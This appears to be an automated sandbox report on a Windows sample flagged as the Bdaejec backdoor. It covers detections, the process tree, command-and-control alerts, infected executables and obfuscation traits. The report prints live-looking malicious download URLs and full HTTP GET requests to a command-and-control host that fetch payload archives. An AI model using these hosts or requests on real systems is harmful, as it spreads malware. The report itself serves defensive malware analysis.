Edit tour

Windows Analysis Report
biKy3nZEyJ.exe

Overview

General Information

Sample name:	biKy3nZEyJ.exe renamed because original name is a hash value
Original sample name:	98DC44E47B06318EBD73414912CD60F5FF71B3FE172476D353B4DDA39C7DC327.exe
Analysis ID:	1480645
MD5:	6963bb0311ded02ba57657ba4a61d427
SHA1:	777ed3376f2b380fef0658e6b1ab4a90e4dca901
SHA256:	98dc44e47b06318ebd73414912cd60f5ff71b3fe172476d353b4dda39c7dc327
Tags:	exe
Infos:

Detection

Bdaejec

Score:	81
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Yara detected Bdaejec

AI detected suspicious sample

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Sigma detected: Use Short Name Path in Command Line

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

biKy3nZEyJ.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\biKy3nZEyJ.exe" MD5: 6963BB0311DED02BA57657BA4A61D427)

TJytnf.exe (PID: 3044 cmdline: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)

WerFault.exe (PID: 7592 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1568 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: TJytnf.exe PID: 3044	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security

Sigma Signatures

System Summary

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\TJytnf.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\TJytnf.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\TJytnf.exe, ParentCommandLine: "C:\Users\user\Desktop\biKy3nZEyJ.exe", ParentImage: C:\Users\user\Desktop\biKy3nZEyJ.exe, ParentProcessId: 7128, ParentProcessName: biKy3nZEyJ.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, ProcessId: 3044, ProcessName: TJytnf.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	2024-07-24T22:28:23.363275+0200
SID:	2838522
Source Port:	49362
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.7 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T22:28:24.383859+0200
SID:	2807908
Source Port:	49699
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.7 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T22:28:29.875738+0200
SID:	2807908
Source Port:	49700
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: biKy3nZEyJ.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k1.rar?	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net/ava	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarC:	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarmples	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar%	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar86)	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rars	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarp	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/Pt	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar0	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarp	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarbC:	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar%	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar(	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: biKy3nZEyJ.exe

Joe Sandbox ML: detected

Source: biKy3nZEyJ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdb source: biKy3nZEyJ.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.5.dr
Source:	Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdbe source: biKy3nZEyJ.exe

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 5_2_00F729E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

5_2_00F729E2

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 5_2_00F72B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

5_2_00F72B8C

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 799

Source: global traffic

TCP traffic: 192.168.2.7:49699 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 5_2_00F71099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

5_2_00F71099

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: TJytnf.exe, 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmp, TJytnf.exe, 00000005.00000003.1270045728.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/Pt
Source: TJytnf.exe, 00000005.00000002.1847735199.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/ava
Source: TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar%
Source: TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar(
Source: TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar0
Source: TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar?
Source: TJytnf.exe, 00000005.00000003.1303493025.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarbC:
Source: TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
Source: TJytnf.exe, 00000005.00000003.1303493025.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
Source: TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar%
Source: TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar86)
Source: TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarC:
Source: TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarmples
Source: TJytnf.exe, 00000005.00000002.1848086577.000000000309A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: SciTE.exe.5.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.5.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: SciTE.exe.5.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_3300877b-6

System Summary

PE file contains section with special chars

Source: biKy3nZEyJ.exe	Static PE information: section name: A#uq
Source: MyProg.exe.5.dr	Static PE information: section name: Y\|uR

PE file has a writeable .text section

Source: TJytnf.exe.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00452810	1_2_00452810
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_0044DC20	1_2_0044DC20
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00442030	1_2_00442030
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00442970	1_2_00442970
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00451E50	1_2_00451E50
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_0044DAC0	1_2_0044DAC0
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_004522C0	1_2_004522C0
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_004492E0	1_2_004492E0
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00441360	1_2_00441360
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_0040431D	1_2_0040431D
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Code function: 5_2_00F76076	5_2_00F76076
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Code function: 5_2_00F76D00	5_2_00F76D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\TJytnf.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1568

Source: MyProg.exe.5.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: biKy3nZEyJ.exe, 00000001.00000000.1268119795.000000000073B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNHASPX.exeF vs biKy3nZEyJ.exe
Source: biKy3nZEyJ.exe	Binary or memory string: OriginalFilenameNHASPX.exeF vs biKy3nZEyJ.exe

Source: biKy3nZEyJ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: TJytnf.exe.1.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: TJytnf.exe.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: TJytnf.exe.1.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal81.spre.troj.evad.winEXE@6/13@1/1

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 5_2_00F7119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

5_2_00F7119F

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rar

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3044

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe

File created: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe

Jump to behavior

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\biKy3nZEyJ.exe "C:\Users\user\Desktop\biKy3nZEyJ.exe"
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Process created: C:\Users\user\AppData\Local\Temp\TJytnf.exe C:\Users\user~1\AppData\Local\Temp\TJytnf.exe
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1568
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Process created: C:\Users\user\AppData\Local\Temp\TJytnf.exe C:\Users\user~1\AppData\Local\Temp\TJytnf.exe	Jump to behavior

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: biKy3nZEyJ.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: biKy3nZEyJ.exe

Static file information: File size 3101704 > 1048576

Source: biKy3nZEyJ.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x259600

Source: biKy3nZEyJ.exe

Static PE information: More than 200 imports for USER32.dll

Source: biKy3nZEyJ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdb source: biKy3nZEyJ.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.5.dr
Source:	Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdbe source: biKy3nZEyJ.exe

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Unpacked PE file: 5.2.TJytnf.exe.f70000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: A#uq

Source: biKy3nZEyJ.exe	Static PE information: section name: CONST
Source: biKy3nZEyJ.exe	Static PE information: section name: A#uq
Source: TJytnf.exe.1.dr	Static PE information: section name: .aspack
Source: TJytnf.exe.1.dr	Static PE information: section name: .adata
Source: Uninstall.exe.5.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.5.dr	Static PE information: section name: PELIB
Source: MyProg.exe.5.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.5.dr	Static PE information: section name: u

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00401840 push 00411729h; ret	1_2_00401845
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00405846 push ecx; retn 006Dh	1_2_00405847
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00403454 push 00406339h; ret	1_2_00403468
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00402455 push FFFFFF86h; ret	1_2_00402457
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00404C6D push 0040598Ch; ret	1_2_00404CAC
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_0040187A push 0041A712h; ret	1_2_00401887
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00407C04 push 00424CBFh; ret	1_2_00407C0C
